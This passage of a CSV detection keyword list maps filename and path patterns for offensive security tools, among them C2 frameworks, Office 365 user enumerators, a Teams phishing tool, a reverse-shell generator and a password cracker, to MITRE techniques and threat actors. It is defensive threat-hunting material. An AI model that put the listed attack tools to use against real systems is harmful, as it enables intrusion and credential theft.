+"*o365creeper.py*","offensive_tool_keyword","o365creeper","Python script that performs email address validation against Office 365 without submitting login attempts","T1592.002 - T1596","TA0007","N/A","N/A","Network Exploitation tools","https://github.com/LMGsec/o365creeper","1","1","N/A","N/A","3","265","57","2020-08-07T17:40:41Z","2019-07-12T21:32:05Z" +"*o365creeper-master*","offensive_tool_keyword","o365creeper","Python script that performs email address validation against Office 365 without submitting login attempts","T1592.002 - T1596","TA0007","N/A","N/A","Network Exploitation tools","https://github.com/LMGsec/o365creeper","1","1","N/A","N/A","3","265","57","2020-08-07T17:40:41Z","2019-07-12T21:32:05Z" +"*o365enum.py*","offensive_tool_keyword","o365enum","Enumerate valid usernames from Office 365 using ActiveSync - Autodiscover v1 or office.com login page.","T1595 - T1595.002 - T1114 - T1114.001 - T1087 - T1087.002","TA0040 - TA0010 - TA0007","N/A","N/A","Exploitation 
tools","https://github.com/gremwell/o365enum","1","1","N/A","7","3","212","40","2021-04-23T14:40:52Z","2020-02-18T12:22:50Z" +"*o365enum-master*","offensive_tool_keyword","o365enum","Enumerate valid usernames from Office 365 using ActiveSync - Autodiscover v1 or office.com login page.","T1595 - T1595.002 - T1114 - T1114.001 - T1087 - T1087.002","TA0040 - TA0010 - TA0007","N/A","N/A","Exploitation tools","https://github.com/gremwell/o365enum","1","1","N/A","7","3","212","40","2021-04-23T14:40:52Z","2020-02-18T12:22:50Z" +"*o365recon*","offensive_tool_keyword","o365recon","script to retrieve information via O365 with a valid cred","T1087 - T1074 - T1003 - T1002 - T1552","TA0003 - TA0011 - TA0006","N/A","N/A","Information Gathering","https://github.com/nyxgeek/o365recon","1","1","N/A","N/A","7","617","94","2022-08-14T04:18:28Z","2017-09-02T17:19:42Z" +"*o365recon.git*","offensive_tool_keyword","o365recon","script to retrieve information via O365 and AzureAD with a valid cred ","T1110 - T1081 - T1081.001 - T1114 - T1087","TA0006 - TA0007","N/A","N/A","Reconnaissance","https://github.com/nyxgeek/o365recon","1","1","N/A","N/A","7","617","94","2022-08-14T04:18:28Z","2017-09-02T17:19:42Z" +"*o365recon.ps1*","offensive_tool_keyword","o365recon","script to retrieve information via O365 and AzureAD with a valid cred ","T1110 - T1081 - T1081.001 - T1114 - T1087","TA0006 - TA0007","N/A","N/A","Reconnaissance","https://github.com/nyxgeek/o365recon","1","1","N/A","N/A","7","617","94","2022-08-14T04:18:28Z","2017-09-02T17:19:42Z" +"*o365recon-master*","offensive_tool_keyword","o365recon","script to retrieve information via O365 and AzureAD with a valid cred ","T1110 - T1081 - T1081.001 - T1114 - T1087","TA0006 - TA0007","N/A","N/A","Reconnaissance","https://github.com/nyxgeek/o365recon","1","1","N/A","N/A","7","617","94","2022-08-14T04:18:28Z","2017-09-02T17:19:42Z" +"*oab-parse.py*","offensive_tool_keyword","cobaltstrike","Information released publicly by NCC Group's Full 
Spectrum Attack Simulation (FSAS) team","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nccgroup/nccfsas","1","1","N/A","10","10","594","117","2022-08-05T16:25:42Z","2020-06-25T09:33:45Z" +"*oaburl.py */*:*@* -e *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*obfuscate.py grunt*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - 
TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","0","N/A","10","10","3790","733","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" +"*Obfuscate.py*","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","10","10","720","166","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z" +"*obfuscate/shellter*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" +"*obfuscate_cmdlet*","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. 
utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","1","N/A","10","10","3255","534","2023-08-08T06:24:24Z","2022-10-25T22:02:59Z" +"*obfuscate_command*","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z" +"*obfuscated_module_source/*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. 
the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1051","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*obfuscator*antidisassembly.*","offensive_tool_keyword","Alcatraz","x64 binary obfuscator","T1027 - T1140","TA0004 - TA0042","N/A","N/A","Defense Evasion","https://github.com/weak1337/Alcatraz","1","1","N/A","10","10","1345","219","2023-07-14T14:19:01Z","2022-12-21T17:27:56Z" +"*obfuscator.cpp*","offensive_tool_keyword","Alcatraz","x64 binary obfuscator","T1027 - T1140","TA0004 - TA0042","N/A","N/A","Defense Evasion","https://github.com/weak1337/Alcatraz","1","0","N/A","10","10","1345","219","2023-07-14T14:19:01Z","2022-12-21T17:27:56Z" +"*obfuskittiedump*","offensive_tool_keyword","WinPwn","Automation for internal Windows 
Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*objects.githubusercontent.com/github-production-release-asset-*","greyware_tool_keyword","github","Github executables download initiated - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*objects_constrained_delegation_full.txt*","offensive_tool_keyword","adhunt","Tool for exploiting Active Directory Enviroments - enumeration","T1018 - T1087 - T1087.002 - T1069 - T1069.002","TA0007 - TA0003 - TA0001","N/A","N/A","AD Enumeration","https://github.com/karendm/ADHunt","1","1","N/A","7","1","41","8","2023-08-10T18:55:39Z","2023-06-20T13:24:10Z" +"*objects_rbcd_delegation_full.txt*","offensive_tool_keyword","adhunt","Tool for exploiting Active Directory Enviroments - enumeration","T1018 - T1087 - T1087.002 - T1069 - T1069.002","TA0007 - TA0003 - TA0001","N/A","N/A","AD Enumeration","https://github.com/karendm/ADHunt","1","0","N/A","7","1","41","8","2023-08-10T18:55:39Z","2023-06-20T13:24:10Z" +"*objects_unconstrained_delegation_full.txt*","offensive_tool_keyword","adhunt","Tool for exploiting Active Directory Enviroments - enumeration","T1018 - T1087 - T1087.002 - T1069 - T1069.002","TA0007 - TA0003 - TA0001","N/A","N/A","AD Enumeration","https://github.com/karendm/ADHunt","1","1","N/A","7","1","41","8","2023-08-10T18:55:39Z","2023-06-20T13:24:10Z" +"*objexec *.o*","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - 
T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" +"*obscuritylabs*","offensive_tool_keyword","Github Username","resources for pentesters","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/obscuritylabs","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*obscuritylabs/ase:latest*","offensive_tool_keyword","cobaltstrike","Rapid Attack Infrastructure (RAI)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/obscuritylabs/RAI","1","1","N/A","10","10","283","53","2021-10-06T17:44:19Z","2018-02-12T16:23:23Z" +"*obscuritylabs/RAI/*","offensive_tool_keyword","cobaltstrike","Rapid Attack Infrastructure (RAI)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - 
T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/obscuritylabs/RAI","1","1","N/A","10","10","283","53","2021-10-06T17:44:19Z","2018-02-12T16:23:23Z" +"*OCSAF/freevulnsearch*","greyware_tool_keyword","nmap","Install and update external NSE script for nmap","T1046 - T1059.001 - T1027.002","TA0007 - TA0005","N/A","N/A","Vulnerability Scanner","https://github.com/shadawck/nse-install","1","1","N/A","7","1","3","1","2020-08-28T11:27:08Z","2020-08-24T16:55:55Z" +"*octetsplicer/LAZYPARIAH*","offensive_tool_keyword","LAZYPARIAH","LAZYPARIAH - A Tool For Generating Reverse Shell Payloads On The Fly","T1059 - T1566 - T1212 - T1574","TA0002 - TA0003 - TA0008","N/A","N/A","POST Exploitation tools","https://github.com/octetsplicer/LAZYPARIAH","1","1","N/A","N/A","2","136","30","2022-06-18T08:59:45Z","2020-11-20T05:08:36Z" +"*Octoberfest7/KDStab*","offensive_tool_keyword","cobaltstrike","BOF combination of KillDefender and Backstab","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 
- T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Octoberfest7/KDStab","1","1","N/A","10","10","146","35","2023-03-23T02:22:50Z","2022-03-10T06:09:52Z" +"*Octoberfest7/TeamsPhisher*","offensive_tool_keyword","teamsphisher","Send phishing messages and attachments to Microsoft Teams users","T1566.001 - T1566.002 - T1204.001","TA0001 - TA0005","N/A","N/A","phishing","https://github.com/Octoberfest7/TeamsPhisher","1","1","N/A","N/A","9","832","109","2023-07-14T00:23:30Z","2023-07-03T02:19:47Z" +"*octopus.py *","offensive_tool_keyword","octopus","Octopus is an open source. 
pre-operation C2 server based on python which can control an Octopus powershell agent through HTTP/S.","T1071 T1090 T1102","N/A","N/A","N/A","C2","https://github.com/mhaskar/Octopus","1","0","N/A","10","10","702","158","2021-07-06T23:52:37Z","2019-08-30T21:09:07Z" +"*OEP_Hiijack_Inject_Load*","offensive_tool_keyword","C2 related tools","A shellcode loader written using nim","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/aeverj/NimShellCodeLoader","1","1","N/A","10","10","555","105","2023-08-26T12:48:08Z","2021-01-19T15:57:01Z" +"*offensive_notion.exe*","offensive_tool_keyword","OffensiveNotion","Notion (yes the notetaking app) as a C2.","T1090 - T1090.002 - T1071 - T1071.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/mttaggart/OffensiveNotion","1","1","N/A","10","10","1002","111","2023-05-21T13:24:01Z","2022-01-18T16:39:54Z" +"*offensive_notion_darwin_*","offensive_tool_keyword","OffensiveNotion","Notion (yes the notetaking app) as a C2.","T1090 - T1090.002 - T1071 - T1071.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/mttaggart/OffensiveNotion","1","1","N/A","10","10","1002","111","2023-05-21T13:24:01Z","2022-01-18T16:39:54Z" +"*offensive_notion_linux_*","offensive_tool_keyword","OffensiveNotion","Notion (yes the notetaking app) as a 
C2.","T1090 - T1090.002 - T1071 - T1071.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/mttaggart/OffensiveNotion","1","1","N/A","10","10","1002","111","2023-05-21T13:24:01Z","2022-01-18T16:39:54Z" +"*offensive_notion_win_*.exe*","offensive_tool_keyword","OffensiveNotion","Notion (yes the notetaking app) as a C2.","T1090 - T1090.002 - T1071 - T1071.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/mttaggart/OffensiveNotion","1","1","N/A","10","10","1002","111","2023-05-21T13:24:01Z","2022-01-18T16:39:54Z" +"*OffensiveCSharp*DriverQuery*","offensive_tool_keyword","DriverQuery","Collect details about drivers on the system and optionally filter to find only ones not signed by Microsoft","T1124 - T1057 - T1082","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/matterpreter/OffensiveCSharp/tree/master/DriverQuery","1","1","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" +"*OffensiveCSharp*ETWEventSubscription*","offensive_tool_keyword","ETWEventSubscription","Similar to WMI event subscriptions but leverages Event Tracing for Windows. 
When the event on the system occurs currently either when any user logs in or a specified process is started - the DoEvil() method is executed.","T1053.005 - T1546.003 - T1055.001","TA0004 - TA0005","N/A","N/A","Exploitation tools","https://github.com/matterpreter/OffensiveCSharp/tree/master/ETWEventSubscription","1","1","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" +"*OffensiveCSharp-master*","offensive_tool_keyword","OffensiveCSharp","Collection of Offensive C# Tooling","T1059.001 - T1055.001 - T1027","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/matterpreter/OffensiveCSharp/tree/master","1","1","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" +"*office2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*office365userenum.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*Office-DDE-Payloads*","offensive_tool_keyword","Office-DDE-Payloads","Collection of scripts and templates to generate Word and Excel documents embedded with the DDE. macro-less command execution technique described by @_staaldraad and @0x5A1F (blog post link in References section below). Intended for use during sanctioned red team engagements and/or phishing campaigns.","T1221 - T1222 - T1223","TA0001 - TA0002 - TA0003","N/A","N/A","Phishing","https://github.com/0xdeadbeefJERKY/Office-DDE-Payloads","1","1","N/A","N/A","7","624","162","2023-07-16T08:22:24Z","2017-10-27T22:19:17Z" +"*Offline_WinPwn.ps1*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*offsecginger/koadic*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). 
with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" +"*OgBcAFcAaQBuAGQAbwB3AHMAXABUAGEAcwBrAHMAXABFAHYAZQBuAHQAVgBpAGUAdwBlAHIAUgBDAEUALgBwAHMAMQA=*","offensive_tool_keyword","EventViewer-UACBypass","RCE through Unsafe .Net Deserialization in Windows Event Viewer which leads to UAC bypass","T1078.004 - T1216 - T1068","TA0004 - TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/CsEnox/EventViewer-UACBypass","1","0","N/A","10","2","108","21","2022-04-29T09:42:37Z","2022-04-27T12:56:59Z" +"*OG-Sadpanda/SharpCat*","offensive_tool_keyword","cobaltstrike","C# alternative to the linux cat command... Prints file contents to console. 
For use with Cobalt Strike's Execute-Assembly","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/OG-Sadpanda/SharpCat","1","1","N/A","10","10","16","5","2021-07-15T15:01:02Z","2021-07-15T14:57:53Z" +"*OG-Sadpanda/SharpSword*","offensive_tool_keyword","cobaltstrike","Read the contents of DOCX files using Cobalt Strike's Execute-Assembly","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 
- TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/OG-Sadpanda/SharpSword","1","1","N/A","10","10","110","13","2023-08-22T20:16:28Z","2021-07-15T14:50:05Z" +"*OG-Sadpanda/SharpSword*","offensive_tool_keyword","SharpSword","Read the contents of MS Word Documents using Cobalt Strike's Execute-Assembly","T1562.004 - T1059.001 - T1021.003","TA0005 - TA0002","N/A","N/A","C2","https://github.com/OG-Sadpanda/SharpSword","1","1","N/A","8","10","110","13","2023-08-22T20:16:28Z","2021-07-15T14:50:05Z" +"*OG-Sadpanda/SharpZippo*","offensive_tool_keyword","cobaltstrike","List/Read contents of Zip files (in memory and without extraction) using CobaltStrike's Execute-Assembly","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
